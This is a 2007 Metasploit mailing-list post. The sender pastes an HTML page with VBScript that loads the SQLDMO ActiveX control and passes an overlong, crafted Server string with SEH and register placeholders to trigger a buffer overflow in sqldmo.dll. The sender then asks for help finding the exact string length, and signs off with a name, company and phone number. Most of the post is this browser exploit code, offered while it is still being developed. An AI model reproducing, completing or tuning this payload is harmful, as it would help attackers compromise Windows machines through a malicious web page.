Metasploit mailing list archives

Microsoft SQL Server Distributed Management Objects OLE DLL for


From: manish.gupta at ariosesoftware.com (Manish Gupta)
Date: Thu, 13 Sep 2007 18:04:39 +0530

Hi

I am working on the "Microsoft SQL Server Distributed Management Objects OLE DLL
for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" vulnerability,
whose exploit is:

<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer'></object>
<script language='vbscript'>

targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4

'edx = ecx
edx       = "bb"
seh       = "aa"
StartMode = True
Server    = "http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\te" & _
            "s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\" & _
            "\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\" & _
            "test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" & seh & "CCDmmm" & edx & _
            "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR" & _
            "R\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC" & _
            "C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#" & _
            "$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff" & _
            "fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login     = "aaaaaaaa"
Password  = "bbbbbbbb"

SQLServer.Start StartMode, Server, Login, Password

</script>
</html>

I am not able to find the Server length, so please help me.

Server    = "http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\te" & _
            "s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\" & _
            "\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\" & _
            "test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" & seh & "CCDmmm" & edx & _
            "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR" & _
            "R\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC" & _
            "C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#" & _
            "$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff" & _
            "fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
\\

Regards

Manish Gupta

Ariose Software 

Noida (U.P)

Mbl:-+91-9891650667

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070913/9258a5fb/attachment.htm>